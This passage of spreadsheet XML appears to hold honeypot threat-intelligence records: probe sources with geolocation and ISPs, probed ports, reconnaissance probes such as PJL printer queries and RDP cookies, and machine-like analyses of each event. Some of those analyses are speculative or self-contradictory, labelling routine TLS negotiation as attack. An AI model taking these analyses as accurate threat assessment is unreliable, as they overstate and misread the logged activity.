&amp;&amp; Possible malicious activity is an attempt to gather printer information, likely for reconnaissance or exploitation purposes. The attacker is trying to extract system details from the targeted device. This could be a precursor to further attacks or malicious actions. &amp;&amp; This data suggests an attempt to send a malicious request to a vulnerable service, attempting to exploit it for nefarious purposes, using a potentially disguised user agent. The user agent may be spoofed to appear legitimate. This could be a reconnaissance or exploitation attempt. &amp;&amp; An attacker is attempting to exploit a web service by sending a POST request with malicious JSON data containing RPC commands, likely to inject and execute arbitrary code. The request originates from an IP address that has been used for other malicious activities in the past. The User-Agent header suggests it's being done using a tool designed for vulnerability scanning or exploitation. &amp;&amp; This indicates an attempt to access a PostgreSQL database. The activity appears to be reconnaissance or probing for potential vulnerabilities. The result is that no specific information was retrieved regarding the target database. &amp;&amp; The data suggests an attempted login attempt to an email service, possibly using brute force or guessing the password of a legitimate account. This could be a sign of a malicious actor trying to gain unauthorized access to sensitive information. The IMAP protocol is commonly used for accessing email accounts remotely. &amp;&amp; A POST request is being sent to the /ipp endpoint on a device, likely attempting unauthorized printing or scanning. This could be part of a larger attack aimed at exploiting vulnerable printer software. The user agent suggests this might be related to reconnaissance activities. &amp;&amp; Possible malicious activity involves unauthorized printing or scanning, potentially originating from a compromised device, with suspicious user agent and encoding parameters suggesting potential exploit attempts. The presence of a POST request to the IPP endpoint suggests an attempt to send a print job. The IP address 193.57.138.110 is likely involved in this activity. &amp;&amp; A potential authentication attempt is being made using TLS encryption. This could be a legitimate action or an attempt to disguise malicious activity. The user may be trying to establish a secure connection for unauthorized access. &amp;&amp; An attacker is attempting to establish a secure connection using TLS, likely as a precursor to unauthorized FTP access or data transfer. This could be an initial step in exploiting the service for malicious purposes such as uploading malware or stealing sensitive information. The attacker's goal may be to bypass security measures and gain unauthorized access to the system. &amp;&amp; An attempt was made to authenticate using SSL encryption for an FTP connection, which could be a step towards establishing a secure malicious tunnel. This suggests potential nefarious activity related to exploiting encryption mechanisms for unauthorized access. The goal might be to establish a secure backdoor for further malicious activities. &amp;&amp; A malicious user is attempting to use SSL encryption for FTP authentication, which may indicate an attempt to bypass security measures or hide their activities. They are using the AUTH command to initiate the authentication process over an encrypted connection. This could be a sign of a sophisticated attack."/>
    <s v="PortScan &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Printer Jetter &amp;&amp; SQL Injection &amp;&amp; TLS Attack &amp;&amp; SSL Attack"/>
  </r>
  <r>
    <x v="180"/>
    <x v="180"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:48:45"/>
    <d v="2025-02-24T12:44:55"/>
    <d v="2025-04-30T11:48:45"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}"/>
    <n v="43"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Tapi"/>
    <s v="Vyāra (Old Bus Stand)"/>
    <s v="1253074"/>
    <s v="NA"/>
    <s v="21.1106"/>
    <s v="73.3897"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="Ishan's Network"/>
    <s v="business"/>
    <s v="Pal Digital Networking Pvt. Ltd."/>
    <s v="2017-11-06"/>
    <s v="INPL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6767:85a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="181"/>
    <x v="181"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:33:35"/>
    <d v="2025-04-30T11:33:35"/>
    <d v="2025-04-30T11:33:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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f:fd83"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="182"/>
    <x v="182"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:11:56"/>
    <d v="2025-04-30T11:11:56"/>
    <d v="2025-04-30T11:11:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:b412"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="183"/>
    <x v="183"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:10:44"/>
    <d v="2023-08-06T00:44:00"/>
    <d v="2025-04-30T11:10:44"/>
    <n v="680"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;19133&amp;&amp;39002&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-02-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:5461"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="184"/>
    <x v="184"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:10:43"/>
    <d v="2024-04-24T12:42:03"/>
    <d v="2025-04-30T11:10:43"/>
    <n v="151"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;30732&amp;&amp;52897&amp;&amp;39137&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:e453"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="185"/>
    <x v="185"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:01:40"/>
    <d v="2023-10-15T04:45:28"/>
    <d v="2025-04-30T11:01:40"/>
    <n v="404"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_NTP_H23&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_REDIS_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;35946&amp;&amp;NA&amp;&amp;1433&amp;&amp;3306&amp;&amp;5432&amp;&amp;3389&amp;&amp;443&amp;&amp;110&amp;&amp;53073&amp;&amp;23&amp;&amp;22&amp;&amp;55051&amp;&amp;161&amp;&amp;16150&amp;&amp;9100&amp;&amp;60130&amp;&amp;80&amp;&amp;1080&amp;&amp;52785&amp;&amp;6379&amp;&amp;5900&amp;&amp;389&amp;&amp;143&amp;&amp;21&amp;&amp;445&amp;&amp;62632&amp;&amp;6667&amp;&amp;50063&amp;&amp;51722&amp;&amp;54909"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kqvLPLQAs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XHzRYm'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WLkBOcrqx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WwUQLC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lfLgQh'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65294)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65296)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65310)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58348)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58350)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58356)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RKEkjJKyf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nEaSVo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Gxyfox'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AiQmVtVTW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bBXTyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uDNFFG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jTEhYpNsv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sagbSH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=irblmu'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61734)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61740)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61742)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62134)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62144)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62148)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aGyLBhYwA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YmQvaL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Hmfkhi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gABzQouxK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EVBaHR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iVlnNj'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62686)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62692)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62704)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=diAiMReey'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HosgKs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hHeAal'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LZokIcixx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RJyHGb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VGMOCs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IGdYBDsYc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KOUpxm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NfJrrV'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62460)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62476)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62482)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=icMFGvQWz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eDdUHd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XGXdDg'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,63096)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8476"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This suggests an attempt to connect to an IMAP service without providing any credentials or authentication information, potentially indicating a brute-force attack or port scanning activity. This is likely an attempt to gather information about the target system's services and configuration. The attacker may be trying to identify potential vulnerabilities in the IMAP service. &amp;&amp; A potential malicious activity of an external system attempting to connect to a service on the monitored network using SMB protocol from IP address 147.185.132.118 with port number 63096. This may indicate a brute-force or unauthorized access attempt. The source's intentions could be malicious. &amp;&amp; Possible malicious activity is an incoming SMB connection from IP address 147.185.132.118 to port 63,096, which could be a sign of unauthorized access or potential exploitation. _x000a_This may indicate a brute force attack or scanning for vulnerabilities. _x000a_It might also be a malicious actor trying to gain access to the system through SMB services. &amp;&amp; The data indicates an attempt to retrieve server capabilities, which could be a reconnaissance step by malicious actors to gather information about the system. This is often used as a precursor to other attacks, such as password cracking or exploit attempts. It may also indicate a brute-force attack or a scanning activity. &amp;&amp; No activity detected, likely due to NTP service being inactive or inaccessible at that time. No malicious attempts were observed during this period. Normal operation assumed. &amp;&amp; This log indicates an attempt to access Remote Desktop Protocol (RDP) services without providing valid credentials or authentication, which could be a brute force login attack. The lack of &quot;NA&quot; value suggests that no activity was detected on the RDP service."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="186"/>
    <x v="186"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:00:55"/>
    <d v="2025-04-30T11:00:55"/>
    <d v="2025-04-30T11:00:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:9bd0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="187"/>
    <x v="187"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:53:43"/>
    <d v="2024-12-25T14:05:02"/>
    <d v="2025-04-30T10:53:43"/>
    <n v="60"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2001-09-24"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:da99:a1b5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected in this log entry, but it means that there was no attempt to access or interact with the telnet service. This is an indication of no malicious activity in relation to the telnet service. Nothing suspicious occurred."/>
    <m/>
  </r>
  <r>
    <x v="188"/>
    <x v="188"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:46:38"/>
